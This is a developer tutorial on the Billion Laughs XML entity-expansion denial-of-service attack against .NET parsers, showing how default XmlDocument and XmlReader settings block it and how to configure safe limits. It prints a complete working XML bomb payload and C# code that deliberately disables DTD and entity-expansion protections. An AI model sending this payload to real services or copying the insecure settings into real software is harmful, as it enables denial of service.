lol, the usual expression that we use when something is pretty funny and we want to express it via chats. However, someone discovered an interesting flaw on XML parsers and decided to laugh about it on their faces. The Billion Laughs attack is basically a denial-of-service attack that targets every single XML parser that provides support for Document Type Definition. The Billion Laughs attack is also known as an XML bomb or an exponential entity expansion attack.
How does it works?
You will need to understand before the concept of Entities in XML. An XML entity is a symbolic representation of data, just like a variable in a piece of code. In XML, entities must be declared in the Document Type Definition (DTD), just like an element or an attribute. For example:
<!ENTITY cheese "Mozarella and Cheddar">
The entity cheese will be replaced in the XML parser when you define the name and use the ampersand as prefix:
<somenode>My Favorite cheeses are: &cheese;</somenode>
When a XML parser, found the XML entity, it will expand it resulting in this case in something like "<somenode>My Favorite cheeses are: Mozarella and Cheddar</somenode>
". If the entity definition contains references to other entities, these will also have to be expanded, for example:
<!ENTITY cheese "Mozarella and Cheddar">
<!ENTITY burgerRecipe "Meat, Tomato, Onion, &cheese;">
So the burgerRecipe entity will be "Meat, Tomato, Onion, Mozarella and Cheddar". And that's how this attack works when a entity uses an entity that relies on multiple entities and so on. This kind of attack can happen even when you provide well-formed XML, but the data structure was awfully designed. It can be as well tricky to detect, specially when there's real data on the game and of course, difficult to mitigate when working on multiple XML parsers.
In this article, we will show you how to perform a Billion Laughs XML DoS attack to the default XML Parser of C# and how to prevent it.
Trying to DoS yourself
In order to reproduce this kind of attach in a safe environment (your local computer), proceed to create a new XML file namely billion_laughs.xml
in the Desktop of your computer. This file will contain the following data:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
<!ENTITY lol11 "&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
<!ENTITY lol12 "&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
<!ENTITY lol13 "&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
<!ENTITY lol14 "&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
<!ENTITY lol15 "&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
]>
<lolz>&lol15;</lolz>
This file contains exactly an exagerated representation of the attack. The lol entity will increase exponentially through the creation of a new entity with 10 of the previous created entity and so on. For example, the parser will start printing the value of the entity lol15, but when it is expanded into 10 lol14’s, each of which is expanded into 10 lol13’s, and so on and so forth. By the time everything is expanded to the text lol, there are more than 100,000,000 instances of the string lol.
Now, for the XML Parser, we will use the most simple way to read an XML file that is basically using the XmlDocument class of .NET. The XmlDocument class is an in-memory representation of an XML document. It implements the W3C XML Document Object Model (DOM) Level 1 Core and the Core DOM Level 2. You can read the XML file with the following code:
using System.Xml;
// 1. Create instance of a XmlDocument
XmlDocument doc = new XmlDocument();
// 2. Load file directly. This will parse immediately the entire file !
doc.Load("C:\\Users\\sdkca\\Desktop\\billion_laugh.xml");
In our project, this code will be executed when the user clicks on a button. The button will trigger the action of reading the file, so when we press it, Visual Studio will get slow and will throw the following exception:
System.Xml.XmlException: 'The input document has exceeded a limit set by MaxCharactersFromEntities.'
Besides of the clear exception, you will see as well an interesting behaviour in the memory used by the process, which initially, with something pretty basic as a form, a button, will only use around 17MB of RAM and hardly 1% of the processor:
But, when the user clicks on the button to read the XML file, the memory (102 MB) and processor (17%) usage will increase drastically:
As conclusion of the first example, is that the default class that a lot of developers use to read XML quickly, already imposes the limit of Max Characters From Entities that are allowed, preventing your PC from exploding and destroying your house (just kidding).
Trying to DoS yourself, the comeback
For our second try to break our C# application, we will create an instance the XmlReader and we'll load the file. Using the reader, we will try to process the first node of the file with the following code:
using System.Xml;
// 1. Create an instance of the XmlReader and load file
XmlReader reader = XmlReader.Create("C:\\Users\\sdkca\\Desktop\\billion_laugh.xml");
// At this point, the parser didn't process the file, unless you read it
using (reader)
{
while (reader.Read())
{
// 2. Read at least the first element of the XML
if (reader.IsStartElement()){}
}
}
Once again, running the previous code will trigger another exception that will prevent our app from freezing:
System.Xml.XmlException: 'For security reasons DTD is prohibited in this XML document. To enable DTD processing set the DtdProcessing property on XmlReaderSettings to Parse and pass the settings into XmlReader.Create method.'
Visual Studio saved our asses once again. DTD stands for Document Type Definition, this defines the legal building blocks of an XML document. It's usually used to define document structure with a list of legal elements and attributes. A default instance will disallow the document type definition, so the attack will be barely ignored. We failed once again.
Trying to DoS yourself, the vengeance
As final try, as adviced by our previous exception hinted to, we can simply enable the DTD processing, so our attack will really be executed, however there's an extra protection that was enabled automatically in .NET, the MaxCharactersFromEntities
. This property defines a value indicating the maximum allowable number of characters in a document that result from expanding entities.
A zero (0) value means no limits on the number of characters that result from expanding entities. A non-zero value specifies the maximum number of characters that can result from expanding entities. If the reader attempts to read a document that contains entities such that the expanded size will exceed this property, an XmlException will be thrown.
This property allows you to mitigate denial of service attacks where the attacker submits XML documents that attempt to exceed memory limits via expanding entities. By limiting the characters that result from expanded entities, you can detect the attack and recover reliably. So, if we do really want to be vulnerable to this attack, we would simply set this property to 0:
Remember that this is just for educational purposes, don't set the the MaxCharactersFromEntities
property to 0 never, unless you know what you're doing.
using System.Xml;
// 1. Create custom settings for the XML parser
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Parse;
// Warning: this value should never be 0, this will make your app
// vulnerable to this kind of attack.
// A normal value would be 1024
settings.MaxCharactersFromEntities = 0;
// 2. Create an instance of the XmlReader and load file with custom settings.
XmlReader reader = XmlReader.Create("C:\\Users\\sdkca\\Desktop\\billion_laugh.xml", settings);
// At this point, the parser didn't process the file, unless you read it
using (reader)
{
while (reader.Read())
{
if (reader.IsStartElement()) { }
}
}
And finally ! We have just blocked the interface of the application, so we succesfully DoS' ourselves. However, another interesting behaviour can be observed during the execution of our script. The application won't respond anymore, so you will need to restart it or stop it with Visual Studio. The memory usage remains stable however:
But, we waited for 10 minutes, but our application never reacted, so we just gave up !
Final thoughts
In recent version of the .NET framework, we don't need to worry about this attack really. Maybe if we do really receive an XML file that requires such expansion, we should really recommend them to move just to plain data instead of using Entities. If you will use custom settings using the XmlReaderSettings class, don't forget to set the MaxCharactersFromEntities property to a reasonable value before reading XML files with DTD:
using System.Xml;
// 1. Create custom settings for the XML parser
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Parse;
// Prevent DoS attacks
settings.MaxCharactersFromEntities = 1024;
// 2. Create an instance of the XmlReader and load file with custom settings.
XmlReader reader = XmlReader.Create("C:\\Users\\sdkca\\Desktop\\myxmlfile.xml", settings);
// At this point, the parser didn't process the file, unless you read it
using (reader)
{
// The parser will read without any problem !!!
while (reader.Read())
{
if (reader.IsStartElement()) { }
}
}
This will protect you from the DoS attack and allow you to read DTD xml files if they were prohibited.
Happy coding !